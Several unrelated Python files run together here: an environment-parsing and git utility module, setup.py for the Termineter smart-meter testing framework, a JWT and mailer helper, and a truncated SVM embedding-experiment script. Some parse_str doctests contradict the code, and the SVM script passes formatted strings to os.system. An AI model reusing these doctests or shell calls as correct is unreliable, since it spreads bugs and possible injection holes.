return self.__getattr__(item)
@classmethod
def as_int(cls, key: str, value: str = "") -> bool | Path | ParseResult | IPv4Address | IPv6Address | int | str:
"""
Parse as int if environment variable should be forced to be parsed as int checking if:
- has value,
- key in :data:`Env._parse_as_int` or
- key ends with one of the items in :data:`Env._parse_as_int_suffix`.
Args
key: Environment variable name.
value: Environment variable value (default: "").
Returns:
int, if key should be parsed as int and has value, otherwise according to :func:`parse_str`.
"""
convert = False
if value:
if key in cls._parse_as_int:
convert = True
else:
for item in cls._parse_as_int_suffix:
if key.endswith(item):
convert = True
return int(value) if convert and value.isnumeric() else parse_str(value)
@dataclass
class Git(git.Repo):
"""
Dataclass Wrapper for :class:`git.Repo`.
Represents a git repository and allows you to query references,
gather commit information, generate diffs, create and clone repositories query
the log.
'working_tree_dir' is the working tree directory, but will raise AssertionError if we are a bare repository.
"""
git: GitCmd = field(init=False)
"""
The Git class manages communication with the Git binary.
It provides a convenient interface to calling the Git binary, such as in::
g = Git( git_dir )
g.init() # calls 'git init' program
rval = g.ls_files() # calls 'git ls-files' program
``Debugging``
Set the GIT_PYTHON_TRACE environment variable print each invocation
of the command to stdout.
Set its value to 'full' to see details about the returned values.
"""
git_dir: AnyPath | None = field(default=None, init=False)
"""the .git repository directory, which is always set"""
odb: Type[LooseObjectDB] = field(init=False)
working_dir: AnyPath | None = field(default=None, init=False)
"""working directory of the git command, which is the working tree
directory if available or the .git directory in case of bare repositories"""
path: InitVar[AnyPath | None] = None
"""File or Directory inside the git repository, the default with search_parent_directories"""
expand_vars: InitVar[bool] = True
odbt: InitVar[Type[LooseObjectDB]] = GitCmdObjectDB
"""the path to either the root git directory or the bare git repo"""
search_parent_directories: InitVar[bool] = True
"""if True, all parent directories will be searched for a valid repo as well."""
def __post_init__(self, path: AnyPath | None, expand_vars: bool,
odbt: Type[LooseObjectDB], search_parent_directories: bool):
"""
Create a new Repo instance
Examples:
>>> assert Git(__file__)
>>> Git("~/repo.git") # doctest: +SKIP
>>> Git("${HOME}/repo") # doctest: +SKIP
Raises:
InvalidGitRepositoryError
NoSuchPathError
Args:
path: File or Directory inside the git repository, the default with search_parent_directories set to True
or the path to either the root git directory or the bare git repo
if search_parent_directories is changed to False
expand_vars: if True, environment variables will be expanded in the given path
search_parent_directories: Search all parent directories for a git repository.
Returns:
Git: Git instance
"""
super(Git, self).__init__(path if path is None else Path(path).directory(), expand_vars=expand_vars,
odbt=odbt, search_parent_directories=search_parent_directories)
@property
def top(self) -> Path:
"""Git Top Directory Path."""
path = Path(self.working_dir)
return Path(path.parent if ".git" in path else path)
@dataclass
class Releaser(git.Repo):
"""The :class:`git.Repo` object."""
path: Path = field(default_factory=Path)
git: Git = field(default_factory=Git, init=False)
class TempDir(tempfile.TemporaryDirectory):
"""
Wrapper for :class:`tempfile.TemporaryDirectory` that provides Path-like
"""
def __enter__(self) -> Path:
"""
Return the path of the temporary directory
Returns:
Path of the temporary directory
"""
return Path(self.name)
async def aiocmd(*args, **kwargs) -> CompletedProcess:
"""
Async Exec Command
Examples:
>>> with TempDir() as tmp:
... rv = asyncio.run(aiocmd("git", "clone", "https://github.com/octocat/Hello-World.git", cwd=tmp))
... assert rv.returncode == 0
... assert (tmp / "Hello-World" / "README").exists()
Args:
*args: command and args
**kwargs: subprocess.run kwargs
Raises:
JetBrainsError
Returns:
None
"""
proc = await asyncio.create_subprocess_exec(*args, stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE, **kwargs)
stdout, stderr = await proc.communicate()
completed = subprocess.CompletedProcess(args, returncode=proc.returncode,
stdout=stdout.decode() if stdout else None,
stderr=stderr.decode() if stderr else None)
if completed.returncode != 0:
raise CmdError(completed)
return completed
cli_invoke = CliRunner().invoke
def cmd(*args, **kwargs) -> CompletedProcess:
"""
Exec Command
Examples:
>>> with TempDir() as tmp:
... rv = cmd("git", "clone", "https://github.com/octocat/Hello-World.git", tmp)
... assert rv.returncode == 0
... assert (tmp / "README.md").exists()
Args:
*args: command and args
**kwargs: subprocess.run kwargs
Raises:
CmdError
Returns:
None
"""
completed = subprocess.run(args, **kwargs, capture_output=True, text=True)
if completed.returncode != 0:
raise CmdError(completed)
return completed
def parse_env(name: str = "USER") -> bool | Path | ParseResult | IPv4Address | IPv6Address | int | str | None:
"""
Parses variable from environment using :func:`mreleaser.parse_str`,
except ``SUDO_UID`` or ``SUDO_GID`` which are parsed as int instead of bool.
Arguments:
name: variable name to parse from environment (default: USER)
Examples:
>>> assert isinstance(parse_env(), str)
>>>
>>> os.environ['FOO'] = '1'
>>> assert parse_env("FOO") is True
>>>
>>> os.environ['FOO'] = '0'
>>> assert parse_env("FOO") is False
>>>
>>> os.environ['FOO'] = 'TrUe'
>>> assert parse_env("FOO") is True
>>>
>>> os.environ['FOO'] = 'OFF'
>>> assert parse_env("FOO") is False
>>>
>>> os.environ['FOO'] = '~/foo'
>>> assert parse_env("FOO") == Path('~/foo')
>>>
>>> os.environ['FOO'] = '/foo'
>>> assert parse_env("FOO") == Path('/foo')
>>>
>>> os.environ['FOO'] = './foo'
>>> assert parse_env("FOO") == Path('./foo')
>>>
>>> os.environ['FOO'] = './foo'
>>> assert parse_env("FOO") == Path('./foo')
>>>
>>> v = "https://github.com"
>>> os.environ['FOO'] = v
>>> assert parse_env("FOO").geturl() == v
>>>
>>> v = "[email protected]"
>>> os.environ['FOO'] = v
>>> assert parse_env("FOO").geturl() == v
>>>
>>> v = "0.0.0.0"
>>> os.environ['FOO'] = v
>>> assert parse_env("FOO").exploded == v
>>>
>>> os.environ['FOO'] = "::1"
>>> assert parse_env("FOO").exploded.endswith(":0001")
>>>
>>> v = "2"
>>> os.environ['FOO'] = v
>>> assert parse_env("FOO") == int(v)
>>>
>>> v = "2.0"
>>> os.environ['FOO'] = v
>>> assert parse_env("FOO") == v
>>>
>>> del os.environ['FOO']
>>> assert parse_env("FOO") is None
>>>
>>> assert isinstance(parse_env("PATH"), str)
Returns:
None
"""
if value := os.environ.get(name):
return Env.as_int(name, value)
return value
def parse_str(data: Any | None = None) -> bool | Path | ParseResult | IPv4Address | IPv6Address | int | str | None:
"""
Parses str or data.__str__()
Parses:
- bool: 1, 0, True, False, yes, no, on, off (case insensitive)
- int: integer only numeric characters but 1 and 0
- ipaddress: ipv4/ipv6 address
- url: if "://" or "@" is found it will be parsed as url
- path: if "." or start with "/" or "~" or "." and does contain ":"
- others as string
Arguments:
data: variable name to parse from environment (default: USER)
Examples:
>>> assert parse_str() is None
>>>
>>> assert parse_str("1") is True
>>> assert parse_str("0") is False
>>> assert parse_env("TrUe") is True
>>> assert parse_str("OFF") is False
>>>
>>> assert parse_str("https://github.com").geturl() == "https://github.com"
>>> assert parse_str("[email protected]").geturl() == "[email protected]"
>>>
>>> assert parse_str("~/foo") == Path('~/foo')
>>> assert parse_str("/foo") == Path('/foo')
>>> assert parse_str("./foo") == Path('./foo')
>>> assert parse_str(".") == Path('./foo')
>>> assert parse_str(Path()) == Path()
>>> assert isinstance(parse_str(Git()), Path)
>>>
>>> assert parse_str("0.0.0.0").exploded == "0.0.0.0"
>>> assert parse_str("::1").exploded.endswith(":0001")
>>>
>>> assert parse_str("2") == 2
>>> assert parse_str("2.0") == "2.0"
>>> assert parse_str("/usr/share/man:") == "/usr/share/man:"
>>> assert isinstance(parse_str(os.environ["PATH"]), str)
Returns:
None
"""
if data is not None:
if not isinstance(data, str): data = str(data)
if data.lower() in ['1', 'true', 'yes', 'on']:
return True
elif data.lower() in ['0', 'false', 'no', 'off']:
return False
elif '://' in data or '@' in data:
return urllib.parse.urlparse(data)
elif (data[0] in ['/', '~', './'] and ":" not in data) or data == ".":
return Path(data)
else:
try:
return ipaddress.ip_address(data)
except ValueError:
if data.isnumeric():
return int(data)
return data
def suppress(func: Callable[P, T], *args: P.args, exception: ExcType | None = Exception, **kwargs: P.kwargs) -> T:
"""
Try and supress exception.
Args:
func: function to call
*args: args to pass to func
exception: exception to suppress (default: Exception)
**kwargs: kwargs to pass to func
Returns:
result of func
"""
with contextlib.suppress(exception or Exception):
return func(*args, **kwargs)
def version(package: str = __project__) -> str:
"""
Package installed version
Examples:
>>> from semver import VersionInfo
>>> assert VersionInfo.parse(version("pip"))
Arguments:
package: package name (Default: `PROJECT`)
Returns
Installed version
"""
return suppress(importlib.metadata.version, package or Path(__file__).parent.name,
exception=importlib.metadata.PackageNotFoundError)
@app.command(name="package")
def _package(path: Optional[list[Path]] = Argument('.', help='Directory Path to package'),) -> None:
"""
Prints the package name from setup.cfg in path.
\b
Returns:
None
"""
print(version())
@app.command(name="--version")
def _version() -> None:
"""
Prints the installed version of the package.
Returns:
None
"""
print(version())
if __name__ == "__main__":
from typer import Exit
try:
Exit(app())
except KeyboardInterrupt:
print('Aborted!')
Exit()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# vim: tabstop=4 softtabstop=4 shiftwidth=4 noexpandtab
#
# setup.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import os
import sys
base_directory = os.path.dirname(__file__)
try:
from setuptools import setup, find_packages
except ImportError:
print('This project needs setuptools in order to build. Install it using your package')
print('manager (usually python-setuptools) or via pip (pip install setuptools).')
sys.exit(1)
try:
import pypandoc
long_description = pypandoc.convert(os.path.join(base_directory, 'README.md'), 'rst')
except (ImportError, OSError):
print('The pypandoc module is unavailable, can not generate the long description', file=sys.stderr)
long_description = None
DESCRIPTION = """\
Termineter is a Python framework which provides a platform for the security \
testing of smart meters.\
"""
setup(
name='termineter',
version='1.0.5',
author='Spencer McIntyre',
author_email='[email protected]',
maintainer='Spencer McIntyre',
description=DESCRIPTION,
long_description=long_description,
url='https://github.com/securestate/termineter',
license='BSD',
# these are duplicated in requirements.txt
install_requires=[
'crcelk>=1.0',
'pluginbase>=0.5',
'pyasn1>=0.1.7',
'pyserial>=2.6',
'smoke-zephyr>=1.2',
'tabulate>=0.8.1',
'termcolor>=1.1.0'
],
package_dir={'': 'lib'},
packages=find_packages('lib'),
package_data={
'': ['data/*'],
},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Security'
],
scripts=['termineter']
)
|
import datetime
import hashlib
import jwt
import smtplib, ssl
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
class HashFile(object):
def __init__(self, filename, blocksize = 65536):
file_hash = hashlib.sha256()
with open(filename, 'rb') as f:
fb = f.read(blocksize)
while len(fb) > 0:
file_hash.update(fb)
fb = f.read(blocksize)
self.digest = file_hash.hexdigest()
def getDigest(self):
return self.digest
class TokenManager(object):
def __init__(self, appkey, algorithm="HS256"):
self.key = appkey
self.algo = algorithm
def gen_token(self, ibmserial, week):
token = jwt.encode(
{
'ibmserial': ibmserial,
'week': week,
'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=48)
},
self.key, algorithm=self.algo)
return token
def verify_token(self, token):
try:
data = jwt.decode(token, self.key, algorithms=[self.algo])
if not data['ibmserial'] or not data['week']:
data = {'error': 'Invalid token, required fields missing'}
except Exception as e:
data = {'error': f'{str(e)}'}
return data
class Mailer(object):
def __init__(self, password, sender):
self.sender = sender
self.password = password
def send(self, receiver, mail_message):
message = MIMEMultipart("alternative")
message["Subject"] = "ILC CTE variance"
message["From"] = self.sender
message["To"] = receiver
part = MIMEText(mail_message, "html")
message.attach(part)
context = ssl.create_default_context()
try:
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as server:
server.login(self.sender, self.password)
server.sendmail(self.sender, receiver, message.as_string())
server.quit()
return True, 'Success'
except Exception as e:
return False, e
|
import sys
import os
import argparse
import numpy as np
import pandas as pd
from prettytable import PrettyTable
from multiprocessing import cpu_count
num_cores = cpu_count()
# model_types = ['w2v', 'swe', 'swe_with_randomwalk', 'swe_with_2nd_randomwalk', 'swe_with_bias_randomwalk', 'swe_with_deepwalk', 'swe_with_node2vec']
model_types = ['swe_with_bias_randomwalk']
factor_array = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]
data_path = '../data'
embs_path = '../embs'
model_path = 'models'
result_path = 'results'
format_data_path = 'format_data'
begin_c = 0.015625
run_times = 10
def SVM_format(model_type, input_file, yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight):
if model_type not in model_types:
print('Error: not support %s' % (model_type))
return ''
basename = ''
if input_file.find('head') != -1:
basename += 'head'
elif input_file.find('tail') != -1:
basename += 'tail'
if input_file.find('train') != -1:
basename += 'train'
elif input_file.find('test') != -1:
basename += 'test'
elif input_file.find('dev') != -1:
basename += 'dev'
basename += '_rd%d' % (yelp_round)
lambda_str = str(para_lambda)
lambda_index = lambda_str.index('.')
lambda_str = lambda_str[0:lambda_index] + \
'p' + lambda_str[lambda_index + 1:]
r_str = str(para_r)
r_index = r_str.index('.')
r_str = r_str[0:r_index] + 'p' + r_str[r_index + 1:]
p_str = str(para_p)
p_index = p_str.index('.')
p_str = p_str[0:p_index] + 'p' + p_str[p_index + 1:]
q_str = str(para_q)
q_index = q_str.index('.')
q_str = q_str[0:q_index] + 'p' + q_str[q_index + 1:]
alpha_str = str(para_alpha)
alpha_index = alpha_str.index('.')
alpha_str = alpha_str[0:alpha_index] + 'p' + alpha_str[alpha_index + 1:]
bias_weight_str = str(para_bias_weight)
bias_weight_index = bias_weight_str.index('.')
bias_weight_str = bias_weight_str[0:bias_weight_index] + \
'p' + bias_weight_str[bias_weight_index + 1:]
if model_type == 'w2v':
word_vec_file = os.path.join(
embs_path, '%s_word_vec_rd%d.txt' % (model_type, yelp_round))
format_file = os.path.join(
format_data_path, 'F_%s_%s.txt' % (model_type, basename))
if not os.path.isfile('./get_SVM_format_w2v'):
command = 'gcc get_SVM_format_w2v.c -o get_SVM_format_w2v -lm -pthread -O3 -march=native -Wall -funroll-loops -Wno-unused-result'
print(command)
os.system(command)
if not os.path.isfile(format_file):
command = './get_SVM_format_w2v -input %s -word-vec %s -output %s' % (
input_file, word_vec_file, format_file)
print(command)
os.system(command)
elif model_type == 'swe':
word_vec_file = os.path.join(embs_path, '%s_word_vec_rd%d_l%s_r%s.txt' % (
model_type, yelp_round, lambda_str, r_str))
user_vec_file = os.path.join(embs_path, '%s_user_vec_rd%d_l%s_r%s.txt' % (
model_type, yelp_round, lambda_str, r_str))
format_file = os.path.join(format_data_path, 'F_%s_%s_l%s_r%s.txt' % (
model_type, basename, lambda_str, r_str))
if not os.path.isfile('./get_SVM_format_swe'):
command = 'gcc get_SVM_format_swe.c -o get_SVM_format_swe -lm -pthread -O3 -march=native -Wall -funroll-loops -Wno-unused-result'
print(command)
os.system(command)
if not os.path.isfile(format_file):
command = './get_SVM_format_swe -input %s -word-vec %s -user-vec %s -output %s' % (
input_file, word_vec_file, user_vec_file, format_file)
print(command)
os.system(command)
elif model_type.startswith('swe_with_randomwalk') or model_type.startswith('swe_with_deepwalk'):
word_vec_file = os.path.join(embs_path, '%s_word_vec_rd%d_l%s_r%s_ph%d_pl%d.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length))
user_vec_file = os.path.join(embs_path, '%s_user_vec_rd%d_l%s_r%s_ph%d_pl%d.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length))
format_file = os.path.join(format_data_path, 'F_%s_%s_l%s_r%s_ph%d_pl%d.txt' % (
model_type, basename, lambda_str, r_str, para_path, para_path_length))
if not os.path.isfile('./get_SVM_format_swe'):
command = 'gcc get_SVM_format_swe.c -o get_SVM_format_swe -lm -pthread -O3 -march=native -Wall -funroll-loops -Wno-unused-result'
print(command)
os.system(command)
if not os.path.isfile(format_file):
command = './get_SVM_format_swe -input %s -word-vec %s -user-vec %s -output %s' % (
input_file, word_vec_file, user_vec_file, format_file)
print(command)
os.system(command)
elif model_type.startswith('swe_with_node2vec') or model_type.startswith('swe_with_2nd_randomwalk'):
word_vec_file = os.path.join(embs_path, '%s_word_vec_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str))
user_vec_file = os.path.join(embs_path, '%s_user_vec_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str))
format_file = os.path.join(format_data_path, 'F_%s_%s_l%s_r%s_ph%d_pl%d_p%s_q%s.txt' % (
model_type, basename, lambda_str, r_str, para_path, para_path_length, p_str, q_str))
if not os.path.isfile('./get_SVM_format_swe'):
command = 'gcc get_SVM_format_swe.c -o get_SVM_format_swe -lm -pthread -O3 -march=native -Wall -funroll-loops -Wno-unused-result'
print(command)
os.system(command)
if not os.path.isfile(format_file):
command = './get_SVM_format_swe -input %s -word-vec %s -user-vec %s -output %s' % (
input_file, word_vec_file, user_vec_file, format_file)
print(command)
os.system(command)
elif model_type.startswith('swe_with_bias_randomwalk'):
word_vec_file = os.path.join(embs_path, '%s_word_vec_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str))
user_vec_file = os.path.join(embs_path, '%s_user_vec_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str))
format_file = os.path.join(format_data_path, 'F_%s_%s_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s.txt' % (
model_type, basename, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str))
if not os.path.isfile('./get_SVM_format_swe'):
command = 'gcc get_SVM_format_swe.c -o get_SVM_format_swe -lm -pthread -O3 -march=native -Wall -funroll-loops -Wno-unused-result'
print(command)
os.system(command)
if not os.path.isfile(format_file):
command = './get_SVM_format_swe -input %s -word-vec %s -user-vec %s -output %s' % (
input_file, word_vec_file, user_vec_file, format_file)
print(command)
os.system(command)
return format_file
def tune_para_SVM(model_type, yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight):
if model_type not in model_types:
print('Error: not support %s' % (model_type))
return ''
lambda_str = str(para_lambda)
lambda_index = lambda_str.index('.')
lambda_str = lambda_str[0:lambda_index] + \
'p' + lambda_str[lambda_index + 1:]
r_str = str(para_r)
r_index = r_str.index('.')
r_str = r_str[0:r_index] + 'p' + r_str[r_index + 1:]
p_str = str(para_p)
p_index = p_str.index('.')
p_str = p_str[0:p_index] + 'p' + p_str[p_index + 1:]
q_str = str(para_q)
q_index = q_str.index('.')
q_str = q_str[0:q_index] + 'p' + q_str[q_index + 1:]
alpha_str = str(para_alpha)
alpha_index = alpha_str.index('.')
alpha_str = alpha_str[0:alpha_index] + 'p' + alpha_str[alpha_index + 1:]
bias_weight_str = str(para_bias_weight)
bias_weight_index = bias_weight_str.index('.')
bias_weight_str = bias_weight_str[0:bias_weight_index] + \
'p' + bias_weight_str[bias_weight_index + 1:]
input_dev_file = os.path.join(
data_path, 'SVM_dev_one_fifth_rd%d.txt' % (yelp_round))
# basename = os.path.basename(input_dev_file).split('.')[0]
basename = 'dev_rd%d' % (yelp_round)
if model_type == 'w2v':
c_file = os.path.join(model_path, 'C_%s_%s.txt' %
(model_type, basename))
elif model_type == 'swe':
c_file = os.path.join(model_path, 'C_%s_%s_l%s_r%s.txt' % (
model_type, basename, lambda_str, r_str))
elif model_type.startswith('swe_with_randomwalk') or model_type.startswith('swe_with_deepwalk'):
c_file = os.path.join(model_path, 'C_%s_%s_l%s_r%s_ph%d_pl%d.txt' % (
model_type, basename, lambda_str, r_str, para_path, para_path_length))
elif model_type.startswith('swe_with_node2vec') or model_type.startswith('swe_with_2nd_randomwalk'):
c_file = os.path.join(model_path, 'C_%s_%s_l%s_r%s_ph%d_pl%d_p%s_q%s.txt' % (
model_type, basename, lambda_str, r_str, para_path, para_path_length, p_str, q_str))
elif model_type.startswith('swe_with_bias_randomwalk'):
c_file = os.path.join(model_path, 'C_%s_%s_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s.txt' % (
model_type, basename, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str))
if not os.path.isfile(c_file):
format_dev_file = SVM_format(model_type, input_dev_file, yelp_round, para_lambda,
para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight)
command = '../liblinear/train -n %d -C -v 5 -c %f %s | tee -a %s' % (
num_cores, begin_c, format_dev_file, c_file)
print(command)
with open(c_file, 'w') as fo:
fo.write(command + '\n')
os.system(command)
os.remove(format_dev_file)
return c_file
def get_head_tail_review(yelp_round):
train_file = os.path.join(
data_path, 'SVM_train_one_fifth_rd%d.txt' % (yelp_round))
basename = 'train_rd%d' % (yelp_round)
user_file = os.path.join(data_path, 'user_file_rd%d.txt' % (yelp_round))
head_file = os.path.join(data_path, 'head_user_%s.txt' % (basename))
tail_file = os.path.join(data_path, 'tail_user_%s.txt' % (basename))
if not (os.path.isfile(head_file) and os.path.isfile(tail_file)):
user_df = pd.read_csv(user_file, header=None)
user_df.columns = ['user_id']
user_number = user_df.shape[0]
print("total %d users" % (user_number))
# count how many reviews of each user in training file, ignore unknown user
review_count_dict = dict()
def addKey(x, review_count_dict):
review_count_dict[x] = 0
user_df['user_id'].apply(addKey, args=(review_count_dict, ))
review_number = 0
with open(train_file, 'r') as f:
line = f.readline()
while line:
user_id = line.split('\t', 1)[0]
if user_id != 'unknown_user_id':
review_count_dict[user_id] += 1
review_number += 1
line = f.readline()
print("total %d reviews" % (review_number))
user_df['review_count'] = user_df['user_id'].apply(
review_count_dict.get)
head_users = set()
user_df_sorted = user_df.sort_values('review_count', ascending=False)
head_user_cnt = 0
review_cnt = 0
review_number_half = review_number // 2
for row in user_df_sorted.iterrows():
review_cnt += row[1]['review_count']
if (review_cnt < review_number_half):
head_user_cnt += 1
head_users.add(row[1]['user_id'])
else:
break
print("%d head user" % (head_user_cnt))
print("%d tail user" % (user_number - head_user_cnt))
f_head = open(head_file, 'w')
f_tail = open(tail_file, 'w')
with open(train_file, 'r') as f_train:
for line in f_train:
user_id = line.split('\t', 1)[0]
if user_id != 'unknown_user_id':
if user_id in head_users:
f_head.write(line)
else:
f_tail.write(line)
f_head.close()
f_tail.close()
return head_file, tail_file
def run_SVM_frac(user_train_files, model_type, factor, yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight):
lambda_str = str(para_lambda)
lambda_index = lambda_str.index('.')
lambda_str = lambda_str[0:lambda_index] + \
'p' + lambda_str[lambda_index + 1:]
r_str = str(para_r)
r_index = r_str.index('.')
r_str = r_str[0:r_index] + 'p' + r_str[r_index + 1:]
p_str = str(para_p)
p_index = p_str.index('.')
p_str = p_str[0:p_index] + 'p' + p_str[p_index + 1:]
q_str = str(para_q)
q_index = q_str.index('.')
q_str = q_str[0:q_index] + 'p' + q_str[q_index + 1:]
alpha_str = str(para_alpha)
alpha_index = alpha_str.index('.')
alpha_str = alpha_str[0:alpha_index] + 'p' + alpha_str[alpha_index + 1:]
bias_weight_str = str(para_bias_weight)
bias_weight_index = bias_weight_str.index('.')
bias_weight_str = bias_weight_str[0:bias_weight_index] + \
'p' + bias_weight_str[bias_weight_index + 1:]
factor_str = str(factor)
factor_index = factor_str.index('.')
factor_str = factor_str[0:factor_index] + \
'p' + factor_str[factor_index + 1:]
c_file = tune_para_SVM(model_type, yelp_round, para_lambda, para_r, para_path,
para_path_length, para_p, para_q, para_alpha, para_bias_weight)
basename = os.path.basename(c_file).split('.')[0]
model_file = os.path.join(model_path, '%s.model' % (basename))
result_file = os.path.join(result_path, '%s.txt' % (basename))
para_c = 0.0
with open(c_file, 'r') as f:
para_c = float(f.readlines()[-1].split()[3])
test_file = os.path.join(
data_path, 'SVM_test_one_fifth_rd%d.txt' % (yelp_round))
format_test_file = SVM_format(model_type, test_file, yelp_round, para_lambda, para_r,
para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight)
# accuracy_array[i][r] means: user_type i, r-th accuracy
accuracy_array = [[0] * run_times for i in range(len(user_train_files))]
for i, input_train_file in enumerate(user_train_files):
basename = os.path.basename(input_train_file).split('_', 1)[0]
total = 0
with open(input_train_file, 'r') as f_tail:
for l, line in enumerate(f_tail):
total += 1
# print("%s_reviews %d" % (input_train_file.split('_', 1)[0], total))
format_train_file = SVM_format(model_type, input_train_file, yelp_round, para_lambda,
para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight)
for r in range(run_times):
if model_type == 'w2v':
random_train_file = os.path.join(data_path, 'R_%s_%s_rd%d_f%s_t%d.txt' % (
model_type, basename, yelp_round, factor_str, r))
model_file = os.path.join(model_path, '%s_%s_rd%d_f%s_t%d.model' % (
model_type, basename, yelp_round, factor_str, r))
result_file = os.path.join(result_path, '%s_%s_rd%d_f%s_t%d.txt' % (
model_type, basename, yelp_round, factor_str, r))
elif model_type == 'swe':
random_train_file = os.path.join(data_path, 'R_%s_%s_rd%d_l%s_r%s_f%s_t%d.txt' % (
model_type, basename, yelp_round, lambda_str, r_str, factor_str, r))
model_file = os.path.join(model_path, '%s_%s_rd%d_l%s_r%s_f%s_t%d.model' % (
model_type, basename, yelp_round, lambda_str, r_str, factor_str, r))
result_file = os.path.join(result_path, '%s_%s_rd%d_l%s_r%s_f%s_t%d.txt' % (
model_type, basename, yelp_round, lambda_str, r_str, factor_str, r))
elif model_type.startswith('swe_with_randomwalk') or model_type.startswith('swe_with_deepwalk'):
random_train_file = os.path.join(data_path, 'R_%s_%s_rd%d_l%s_r%s_ph%d_pl%d_f%s_t%d.txt' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, factor_str, r))
model_file = os.path.join(model_path, '%s_%s_rd%d_l%s_r%s_ph%d_pl%d_f%s_t%d.model' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, factor_str, r))
result_file = os.path.join(result_path, '%s_%s_rd%d_l%s_r%s_ph%d_pl%d_f%s_t%d.txt' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, factor_str, r))
elif model_type.startswith('swe_with_node2vec') or model_type.startswith('swe_with_2nd_randomwalk'):
random_train_file = os.path.join(data_path, 'R_%s_%s_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_f%s_t%d.txt' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, factor_str, r))
model_file = os.path.join(model_path, '%s_%s_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_f%s_t%d.model' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, factor_str, r))
result_file = os.path.join(result_path, '%s_%s_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_f%s_t%d.txt' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, factor_str, r))
elif model_type.startswith('swe_with_bias_randomwalk'):
random_train_file = os.path.join(data_path, 'R_%s_%s_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s_f%s_t%d.txt' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str, factor_str, r))
model_file = os.path.join(model_path, '%s_%s_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s_f%s_t%d.model' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str, factor_str, r))
result_file = os.path.join(result_path, '%s_%s_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s_f%s_t%d.txt' % (
model_type, basename, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str, factor_str, r))
if r > 0 and factor == 1.0:
full_model_file = '%s0.model' % (
os.path.splitext(model_file)[0][:-1])
full_result_file = '%s0.txt' % (
os.path.splitext(result_file)[0][:-1])
with open(model_file, 'w') as fw:
with open(full_model_file, 'r') as fr:
line = fr.readline()
while line:
fw.write('%s' % (line))
line = fr.readline()
